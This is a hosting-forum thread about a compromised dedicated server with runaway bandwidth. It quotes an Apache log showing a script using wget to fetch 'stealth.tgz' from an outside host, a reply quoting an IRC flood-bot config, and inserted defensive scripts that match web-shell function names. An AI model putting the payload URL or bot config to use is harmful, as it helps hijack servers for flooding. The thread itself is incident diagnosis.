  1. #1
    Join Date
    Jul 2009
    Posts
    40

    Bandwidth Outburst Issue - Pls Help Me [Urgent]

    Hi All,

    I have a dedicated box with Burst Net; for the last 3 days, my server has been going offline now and then.

    My provider says I am being attacked: there is massive bandwidth consumption on my machine. For the last 6 hours, my server has been pulling a steady 80 Mbps.

    Max In: 9352.6 kB/s (74.8%)

    That's the readout from their MRTG graphs.

    Can someone please help me find, urgently, what is causing this massive bandwidth spike?

  2. #2
    Join Date
    Oct 2002
    Posts
    5,177
    What do your server logs tell you? Web server, FTP services, etc.? There could be any number of reasons. Two examples: 1) a denial of service attack (somebody doing repeated downloads of files) .... 2) your server could have been compromised and is being used to exchange files by a hacker group.
    If you have to operate your company behind the scenes or under a fake name, maybe it's time to leave the industry and start something fresh.

  3. #3
    Join Date
    Oct 2004
    Location
    Kerala, India
    Posts
    4,750
    That seems to be huge. Check which domain's access log file has grown huge; most probably that will be the point of attack. See if hotlink protection is enabled for the sites.
    David | www.cliffsupport.com
    Affordable Server Management Solutions sales AT cliffsupport DOT com
    CliffWebManager | Access WHM from iPhone and Android

  4. #4
    Join Date
    Jul 2009
    Posts
    40
    Quote Originally Posted by Mike V View Post
    What do your server logs tell you? Web server, FTP services, etc.? There could be any number of reasons. Two examples: 1) a denial of service attack (somebody doing repeated downloads of files) .... 2) your server could have been compromised and is being used to exchange files by a hacker group.

    Thanks for replying,
    1) Where can I find bandwidth logs on my server?

    Quote Originally Posted by david510 View Post
    That seems to be huge. Check which domains access log file has got huge size and most probably that will be the point of attack. See if hotlink protection is enabled for sites.

    Thanks for replying,
    1) There is only 1 domain active on the server; which log file shall I check, and what will be the location of that file (it is a Linux server)?
    2) How can I enable hotlink protection (there is no hosting panel on the server)? Let me know how to do it from the shell.

  5. #5
    Join Date
    Oct 2004
    Location
    Kerala, India
    Posts
    4,750
    Assuming an Apache web server is running on the server, the access log files should be at /etc/apache/logs/access_logs.

    Add the following code into the .htaccess file inside the web root of the account.

    Code:
    # The rewrite engine must be switched on for the rules below to take effect
    RewriteEngine On
    # Let through requests that carry no referer (direct hits, some proxies and browsers)
    RewriteCond %{HTTP_REFERER} !^$
    # Let through requests referred from the site itself (replace domain.com with yours)
    RewriteCond %{HTTP_REFERER} !^http://domain.com/.*$ [NC]
    RewriteCond %{HTTP_REFERER} !^http://www.domain.com/.*$ [NC]
    # Anything else asking for these file types is redirected to the home page
    RewriteRule .*\.(gif|jpg|jpeg|mid|html|bmp|txt|wmv|zip|mp3)$ http://www.domain.com [R,NC]
    David | www.cliffsupport.com
    Affordable Server Management Solutions sales AT cliffsupport DOT com
    CliffWebManager | Access WHM from iPhone and Android

  6. #6
    You can see the bandwidth consumed via AWStats if you have a cPanel server.

  7. #7
    Join Date
    Apr 2009
    Posts
    79
    You can install iptraf and run a statistical breakdown, which will tell you what ports are using the excessive amounts of data; then you can do a netstat to find out what's on those ports. tcpdump will tell you info too...

    There are plenty of tools that will help you out, even if you don't have a cPanel server.
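    The iptraf breakdown suggested above is interactive, but the same question (which remote hosts and which local ports carry the connections, and which sockets are actually pushing data out) can be answered from a captured netstat listing. The script below is an added example, not something posted in this thread: it assumes "netstat -tn" column order (Proto, Recv-Q, Send-Q, Local, Remote, State), and the six connection lines in SAMPLE are constructed for the example, using documentation address ranges. On a real box you would pipe the live listing in, e.g. netstat -tn | sed 1,2d | top_remote_hosts.

```shell
#!/bin/sh
# Added example (not from the thread): summarise a "netstat -tn" style
# connection table to see where the connections and the outbound data go.
# SAMPLE is constructed for this example; the IP addresses are documentation
# ranges, not real hosts.

SAMPLE='tcp 0 0 10.0.0.5:2200 198.51.100.7:54403 ESTABLISHED
tcp 0 0 10.0.0.5:80 203.0.113.10:55601 TIME_WAIT
tcp 0 0 10.0.0.5:80 203.0.113.10:55630 TIME_WAIT
tcp 0 0 10.0.0.5:80 203.0.113.10:55652 TIME_WAIT
tcp 0 6392 10.0.0.5:43110 192.0.2.44:6667 ESTABLISHED
tcp 0 0 10.0.0.5:80 203.0.113.99:4398 ESTABLISHED'

# Connections per remote host, busiest first. Column 5 is the remote
# address; the split on ":" assumes IPv4 (IPv6 addresses contain ":" too).
top_remote_hosts() {
    awk '{ split($5, r, ":"); n[r[1]]++ }
         END { for (h in n) print n[h], h }' | sort -rn
}

# Connections per local port, busiest first: tells you which service
# (80 = web, 2200 = the SSH port used in this thread) holds the sockets.
top_local_ports() {
    awk '{ split($4, l, ":"); n[l[2]]++ }
         END { for (p in n) print n[p], "port", p }' | sort -rn
}

# Sockets with a non-empty Send-Q (column 3): the box is pushing data out on
# them right now. A long-lived connection to an unfamiliar host on an IRC
# port like 6667 is what an IRC bot, as discussed later in this thread,
# would typically show; verify with tcpdump on that port before acting.
outbound_senders() {
    awk '$3 > 0 { print $5, "sendq=" $3 }'
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$SAMPLE" | top_remote_hosts
printf '%s\n' "$SAMPLE" | top_local_ports
printf '%s\n' "$SAMPLE" | outbound_senders
```

    The three functions read the table from standard input, so they can be chained behind netstat, a saved capture, or "ss -tn" once the column numbers are adjusted for that tool's output.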

  8. #8
    Join Date
    Mar 2009
    Location
    Israel
    Posts
    1,204
    I would look for some warez ...
    run:
    updatedb ; locate .rar;locate .mp3;locate .avi;locate .torrent;locate .mpeg

    This should find you the bad files and give you some direction.
    beast5.com - Managed Hosting Solutions 2004 - 2016

  9. #9
    Join Date
    Jul 2009
    Posts
    40
    I just saw this error in my Apache error logs - can someone help -


    Code:
    11:41:05 (30.05 KB/s) - `2008.TGZ' saved [9158/9158]
    
    [Fri Jul 17 11:59:03 2009] [error] [client 221.122.76.221] File does not exist: /var/www/html/rc/bin/html2text.php
    [Fri Jul 17 11:59:04 2009] [error] [client 221.122.76.221] File does not exist: /var/www/html/mss2/bin/html2text.php
    [Fri Jul 17 11:59:04 2009] [error] [client 221.122.76.221] File does not exist: /var/www/html/mail/bin/html2text.php
    [Fri Jul 17 11:59:05 2009] [error] [client 221.122.76.221] File does not exist: /var/www/html/roundcubemail/bin/html2text.php
    --11:59:13--  http://kidu.ucoz.com/stealth.tgz
               => `stealth.tgz.1'
    Resolving kidu.ucoz.com... 208.100.61.2
    Connecting to kidu.ucoz.com|208.100.61.2|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 221,710 (217K) [application/octet-stream]
    
        0K .......... .......... .......... .......... .......... 23%  441.87 KB/s
       50K .......... .......... .......... .......... .......... 46%    1.68 MB/s
      100K .......... .......... .......... .......... .......... 69%    1.53 MB/s
      150K .......... .......... .......... .......... .......... 92%   11.32 MB/s
      200K .......... ......                                     100%  891.14 KB/s
    
    11:59:14 (1.07 MB/s) - `stealth.tgz.1' saved [221710/221710]
    
    --11:59:17--  http://kidu.ucoz.com/stealth.tgz
               => `stealth.tgz.2'
    Resolving kidu.ucoz.com... 208.100.61.2
    Connecting to kidu.ucoz.com|208.100.61.2|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 221,710 (217K) [application/octet-stream]
    
        0K .......... .......... .......... .......... .......... 23%  579.44 KB/s
       50K .......... .......... .......... .......... .......... 46%    1.65 MB/s
      100K .......... .......... .......... .......... .......... 69%    1.74 MB/s
      150K .......... .......... .......... .......... .......... 92%    1.93 MB/s
      200K .......... ......                                     100%   11.32 MB/s
    
    11:59:18 (1.24 MB/s) - `stealth.tgz.2' saved [221710/221710]
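    Two things stand out in the error log above: one client requesting html2text.php under several different Roundcube-style paths in quick succession (a scanner trying known locations of a script), and wget progress output sitting in Apache's error log at all, which only happens when a process started by the web server writes to its standard error. The script below is an added example, not something posted in this thread, that pulls both signals out of an error_log. ERRLOG is a constructed excerpt in Apache 2.2 format using documentation addresses and a placeholder download host; the function names are my own.

```shell
#!/bin/sh
# Added example (not from the thread): two checks over an Apache error_log.
#  1) clients that probed for many distinct non-existent paths;
#  2) lines that are not in Apache's own "[date] [level] [client ip] ..."
#     format, which means some other program shared the server's stderr
#     (a wget run by an exploited script leaves exactly this trace).
# ERRLOG is constructed for this example; IPs and hostnames are placeholders.

ERRLOG='[Fri Jul 17 11:59:03 2009] [error] [client 203.0.113.5] File does not exist: /var/www/html/rc/bin/html2text.php
[Fri Jul 17 11:59:04 2009] [error] [client 203.0.113.5] File does not exist: /var/www/html/mail/bin/html2text.php
[Fri Jul 17 11:59:04 2009] [error] [client 203.0.113.5] File does not exist: /var/www/html/roundcubemail/bin/html2text.php
[Fri Jul 17 11:59:10 2009] [error] [client 198.51.100.9] File does not exist: /var/www/html/favicon.ico
--11:59:13--  http://example.invalid/stealth.tgz
           => `stealth.tgz.1'"'"'
Resolving example.invalid... 192.0.2.10
11:59:14 (1.07 MB/s) - `stealth.tgz.1'"'"' saved [221710/221710]
[Fri Jul 17 12:00:01 2009] [notice] caught SIGTERM, shutting down'

# Clients that asked for at least $1 (default 3) distinct missing paths.
# Output: "<count> <client ip>", highest count first.
probing_clients() {
    min=${1:-3}
    grep 'File does not exist' |
    sed 's/.*\[client \([^]]*\)\] File does not exist: \(.*\)/\1 \2/' |
    sort -u |
    awk -v min="$min" '{ n[$1]++ } END { for (c in n) if (n[c] >= min) print n[c], c }' |
    sort -rn
}

# Lines that do not begin with Apache's "[Day Mon DD hh:mm:ss YYYY]" stamp:
# output of some other program writing to the web server's stderr.
foreign_lines() {
    grep -v '^\[[A-Z][a-z][a-z] [A-Z][a-z][a-z] [ 0-9][0-9] [0-9:]* [0-9]*\]'
}

# Of those, the ones shaped like a wget transfer: a "--hh:mm:ss--  url"
# start line or a "saved [bytes/bytes]" completion line.
download_evidence() {
    foreign_lines | grep -E '^--[0-9:]+--  [a-z]+://|saved \[[0-9]+/[0-9]+\]'
}

# Stand-alone run over the constructed excerpt.
printf '%s\n' "$ERRLOG" | probing_clients
printf '%s\n' "$ERRLOG" | download_evidence
```

    Run it as cat /path/to/error_log | probing_clients 5 to raise the threshold on a busy site; the URLs printed by download_evidence tell you what was fetched, and the timestamps line up with the access log entries that triggered the fetch.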

  10. #10
    Join Date
    Jul 2009
    Posts
    40
    Quote Originally Posted by envisage View Post
    You can install iptraf and run a statistical breakdown which will tell you what ports are using the excessive amounts of data - then you can do a netstat to find out whats on those ports. tcpdump will tell you info too...

    There's plenty of tools that will help you out, even if you don't have a cPanel server.
    I have installed iptraf and see the following figures - can you help me with how to study it?

    The first two IPs' figures are ever increasing (one is my server and the other is my PC's IP), so I think this is normal SSH transfer.
    The other connections are static.


    Code:
    IPTraf
    ┌ TCP Connections (Source Host:Port) ──────────────────────────────────── Packets ────────── Bytes ── Flags ──── Iface ─────┐
    │┌my.server.ip.:2200                                                   >    4215          1304096    -PA-       eth0       │
    │└115.240.66.xxx:54403                                                  >    2090           101432    --A-       eth0       │
    │┌61.91.160.36:4398                                                     >       1               46    --A-       eth0       │
    │└my.server.ip.:80                                                     =       0                0    ----       eth0       │
    │┌my.server.ip.:80                                                     >       1               40    --A-       eth0       │
    │└125.26.123.24:55601                                                   =       0                0    ----       eth0       │
    │┌my.server.ip.:80                                                     =       0                0    ----       eth0       │
    │└125.25.109.209:1668                                                   >       1               46    --A-       eth0       │
    │┌118.100.201.242:60148                                                 >       1               46    --A-       eth0       │
    │└my.server.ip.:80                                                     =       0                0    ----       eth0       │
    │┌125.26.123.24:55630                                                   =       0                0    ----       eth0       │
    │└my.server.ip.:80                                                     >       1               40    --A-       eth0       │
    │┌my.server.ip.:80                                                     >       1               40    --A-       eth0       │
    │└202.54.61.99:45238                                                    =       0                0    ----       eth0       │
    │┌125.26.123.24:55652                                                   >       1               46    --A-       eth0       │
    │└my.server.ip.:80                                                     =       0                0    ----       eth0       │
    │┌my.server.ip.:80                                                     >       1               40    --A-       eth0       │
    │└124.121.179.24:58662                                                  =       0                0    ----       eth0       │
    │┌220.181.61.212:31545                                                  >       1               46    --A-       eth0
    Last edited by Leaptopz; 07-22-2009 at 04:12 AM.

  11. #11
    Join Date
    Jul 2009
    Posts
    40
    Again my b/w is compromised and the server went offline.
    Any help?

  12. #12
    Join Date
    Mar 2009
    Posts
    3,807
    What's that stealth.tgz?
    Looks like an emech to me

    SERVER 189.59.65.6
    #conf file

    NICK Flood
    USERFILE cyc.acc
    CMDCHAR !
    LOGIN Flood
    IRCNAME Flood your ip ;-)
    MODES +xi-ws
    handle ip
    mask [email protected]
    channel *
    access 100
    CHANNEL #god # Channel name

  13. #13
    Join Date
    Jul 2009
    Posts
    40
    Quote Originally Posted by quantumphysics View Post
    what's that stealth.tgz?
    looks like an emech to me
    Still looking for someone to give insight into this.

  14. #14
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,294
    You have a PHP or Perl script being exploited on your server. That wget output in your log is from a script.

    You need to investigate your domain access logs for remote include exploits, search for shell scripts, and deploy relevant security measures.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
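    The advice above boils down to three concrete checks on a single-domain Apache box: look in the access log for requests that hand a URL to a script parameter (the shape of a remote file include attempt), look for PHP being executed from directories that should only hold static files, and look for PHP files that were changed recently or contain the functions web shells rely on. The script below is an added example, not something posted in this thread. ACCESSLOG is a constructed combined-format excerpt with documentation addresses; the web root, the directory names treated as static, and the function names are assumptions to adjust for your layout.

```shell
#!/bin/sh
# Added example (not from the thread): checks that follow the advice above.
# ACCESSLOG is constructed for this example (Apache combined log format);
# hosts and paths are placeholders.

ACCESSLOG='203.0.113.5 - - [17/Jul/2009:11:58:50 +0000] "GET /mail/bin/html2text.php HTTP/1.1" 404 295 "-" "Mozilla/4.0"
203.0.113.5 - - [17/Jul/2009:11:59:12 +0000] "GET /roundcubemail/index.php?_page=http://example.invalid/cmd.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.9 - - [17/Jul/2009:11:59:20 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://www.domain.com/" "Mozilla/5.0"
203.0.113.5 - - [17/Jul/2009:12:01:02 +0000] "POST /images/logo.php HTTP/1.1" 200 44 "-" "Mozilla/4.0"'

# Requests whose query string passes a URL as a parameter value, the
# classic remote include pattern. Field 7 of the combined format is the
# request path. Prints "<client> <request>".
remote_include_attempts() {
    awk '$7 ~ /[?&][^=]*=(https?|ftp):\/\// { print $1, $7 }'
}

# PHP executed from directories that should hold only static content
# (assumed names: images, uploads, tmp): a dropped web shell being called.
# Prints "<client> <method> <request>".
php_in_static_dirs() {
    awk '$7 ~ /^\/(images|uploads|tmp)\/[^ ?]*\.php/ { gsub(/"/, "", $6); print $1, $6, $7 }'
}

# PHP files under $1 modified within the last $2 days (default 7). Compare
# the list against your last legitimate deployment.
recent_php_files() {
    find "$1" -type f -name '*.php' -mtime "-${2:-7}"
}

# PHP files under $1 that call functions web shells lean on. A hit is a
# starting point for review, not proof: legitimate code uses them too.
suspicious_php_calls() {
    find "$1" -type f -name '*.php' -exec grep -lE \
        'base64_decode *\(|shell_exec *\(|passthru *\(|popen *\(' {} +
}

# Stand-alone run over the constructed log (adjust WEBROOT for a real box).
WEBROOT=${WEBROOT:-/var/www/html}
printf '%s\n' "$ACCESSLOG" | remote_include_attempts
printf '%s\n' "$ACCESSLOG" | php_in_static_dirs
[ -d "$WEBROOT" ] && recent_php_files "$WEBROOT" 7
[ -d "$WEBROOT" ] && suspicious_php_calls "$WEBROOT"
```

    The two log functions read from standard input, so zcat of rotated logs works as well as the live file; the two filesystem functions take the web root as their first argument. A status of 200 on a remote_include_attempts hit, as in the sample's second line, is the one to investigate first, since it means the script accepted the request.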

  15. #15
    Join Date
    Jul 2009
    Posts
    40
    Quote Originally Posted by Steven View Post
    You have a php or perl script being exploited on your server. That wget output in your log is from a script.

    You need to investigate your domain access logs for remote include exploits, search for shell scripts, and deploy relevant security measures.
    I investigated and it was the "roundcube" mail PHP script causing this error. I have deleted it altogether, but am still facing b/w issues.

  16. #16
    Join Date
    Apr 2003
    Location
    San Jose, CA.
    Posts
    1,622
    You clearly need to be with a managed service provider.. not unmanaged.

  17. #17
    Join Date
    Jul 2009
    Posts
    40
    Quote Originally Posted by Lightwave View Post
    You clearly need to be with a managed service provider.. not unmanaged.
    Thanks but no thanks.
    Have a great day ahead.

  18. #18
    Join Date
    Mar 2009
    Posts
    3,807
    Your server is probably rooted to hell and back at this point..

  19. #19
    Join Date
    Jul 2009
    Posts
    40
    These are my MRTG graphs -

    http://img170.imageshack.us/img170/6...1130113day.png

    I have done all that is possible - closed all unused services, deleted unused files, and checked for all big files.

    Any help??
